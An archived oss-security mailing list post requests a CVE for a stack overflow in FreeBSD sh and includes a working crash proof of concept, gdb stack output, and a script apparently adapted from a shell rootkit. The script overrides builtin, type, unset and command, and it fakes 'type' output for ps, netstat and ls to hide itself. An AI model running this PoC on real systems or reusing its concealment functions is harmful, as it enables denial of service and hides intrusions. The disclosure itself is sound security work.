Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <CAEQi4beSswmoiqOsGHDH8U6rqWDXtyNgHnMmKrYsh+PhZ9PxMw@mail.gmail.com>
Date: Tue, 31 Mar 2015 18:42:01 +0800
From: wzt wzt <wzt.wzt@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request: freebsd/sh stack overflow vulnerability

hi：
    I found sh have a stack overflow bug on freebsd(9.0-10.0),  it may be
triggered on all freebsd systems, but i have not tested yet. the poc below
is tested on freebsd10.0 amd64 arch:

$ ls
brootkit.sh
$ . brootkit.sh
$ command
$ ls
brootkit.sh     sh.core

(gdb) x/16x $rsp+0x1b8
0x7fffdfffeff8: Cannot access memory at address 0x7fffdfffeff8
(gdb) x/16x $rsp+0x1c0
0x7fffdffff000: 0x0000000000000000      0x0000000000000000
0x7fffdffff010: 0x0000000000000000      0x0000000000000000
0x7fffdffff020: 0x0000000000000000      0x0000000000000000
0x7fffdffff030: 0x0000000000000000      0x0000000000000000
0x7fffdffff040: 0x0000000000000000      0x0000000000000000
0x7fffdffff050: 0x0000000000000000      0x0000000000000000
0x7fffdffff060: 0x0000000000000000      0x0000000000000000
0x7fffdffff070: 0x0000000000000000      0x0000000000000000

(gdb) disass malloc malloc+32
Dump of assembler code from 0x800d593f0 to 0x800d59410:
0x0000000800d593f0 <malloc+0>:  push   %rbp
0x0000000800d593f1 <malloc+1>:  mov    %rsp,%rbp
0x0000000800d593f4 <malloc+4>:  push   %r15
0x0000000800d593f6 <malloc+6>:  push   %r14
0x0000000800d593f8 <malloc+8>:  push   %r13
0x0000000800d593fa <malloc+10>: push   %r12
0x0000000800d593fc <malloc+12>: push   %rbx
0x0000000800d593fd <malloc+13>: sub    $0x488,%rsp
0x0000000800d59404 <malloc+20>: mov    %rdi,-0x4a0(%rbp)
0x0000000800d5940b <malloc+27>: mov    0x2c2dbe(%rip),%rax        #
0x80101c1d0 <__nsdefaultsrc+4928>


set $i=0
set $addr=$rbp
while ($i <= 1000)
printf "frame[%d] 0x%lx ==> 0x%lx retaddr: 0x%lx\t diass: ", $i, $addr,
*(long *)$addr, *(long *)($addr+8)
x/i  *(long *)($addr+8)
set $i=$i+1
set $addr=*(long *)$addr
end

frame[98] 0x7fffe0004c00 ==> 0x7fffe0004d60 retaddr: 0x406465    diass:
0x406465 <execve@...+14073>:    incq   0x21d694(%rip)        # 0x623b00
<environ+64>
frame[99] 0x7fffe0004d60 ==> 0x7fffe0004e10 retaddr: 0x40513b    diass:
0x40513b <execve@...+9167>:     mov    -0x74(%rbp),%r14d
frame[100] 0x7fffe0004e10 ==> 0x7fffe0004ec0 retaddr: 0x405118   diass:
0x405118 <execve@...+9132>:     cmpl   $0x0,0x21e9f5(%rip)        #
0x623b14 <environ+84>

poc:

#!/bin/sh

BR_ROOTKIT_PATH="."

builtin()
{
        local fake_a

        unset command
        case $1 in
                "set"|"unset"|"command"|"type")
                        fake_a="$(command builtin $1 $2)"
                        br_hide_engine "$fake_a"
                        reset_command
                        return ;;
                "builtin")
                        echo "sh: builtin: builtin: syntax error, sh is not
support."
                        reset_command
                        return ;;
                *)
                        command builtin $1 $2
                        reset_command
                        ;;
        esac
}

type()
{
        case $1 in
                "builtin"|"set"|"unset"|"type")
                        echo "$1 is a shell builtin"
                        return ;;
                "dir")
                        echo "dir is /usr/bin/dir"
                        return ;;
                "ls")
                        echo "ls is aliased to ls --color=tty"
                        return ;;
                "ps")
                        echo "ps is /bin/ps"
                        return ;;
                "netstat")
                        echo "netstat is hashed (/usr/bin/netstat)"
                        return ;;
                "/bin/ls"|"/usr/bin/dir"|"/bin/ps"|"/usr/bin/netstat")
                        echo "$1 is $1"
                        return ;;
                *)
                        unset command
                        command type $1 $2
                        reset_command
                        return ;;
        esac
}

fake_unset()
{
        case $1 in
                "builtin"|"command"|"set"|"unset"|"type")
                        echo "sh: syntax error, sh is not support."
                        return ;;
                *)
                        unset $1 $2
                        return ;;
        esac
}

fake_command()
{
        case $1 in
                "builtin"|"command"|"set"|"unset"|"type")
                        echo "sh: syntax error, sh is not support."
                        return ;;
                *)
                        unset command
                        command $1 $2
                        reset_command
                        return ;;
        esac
}

command()
{
        case $1 in
                "builtin")
                        builtin $2 $3
                        return ;;
                "unset")
                        fake_unset $2 $3
                        . $BR_ROOTKIT_PATH/brootkit.sh
                        return ;;
                "type")
                        type $2 $3
                        return ;;
                "command")
                        fake_command $2 $3
                        return ;;
                *)
                        unset command
                        command $2 $3
                        . $BR_ROOTKIT_PATH/brootkit.sh
                        return ;;
        esac
}

reset_command()
{
        command()
        {
                case $1 in
                        "builtin")
                                builtin $2 $3
                                return ;;
                        "set")
                                set $2 $3
                                return ;;
                        "unset")
                                fake_unset $2 $3
                                . $BR_ROOTKIT_PATH/brootkit.sh
                                return ;;
                        "type")
                                type $2 $3
                                return ;;
                        "command")
                                fake_command $2 $3
                                return ;;
                        *)
                                unset command
                                command $2 $3
                                . $BR_ROOTKIT_PATH/brootkit.sh
                                return ;;
                esac
        }
}

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.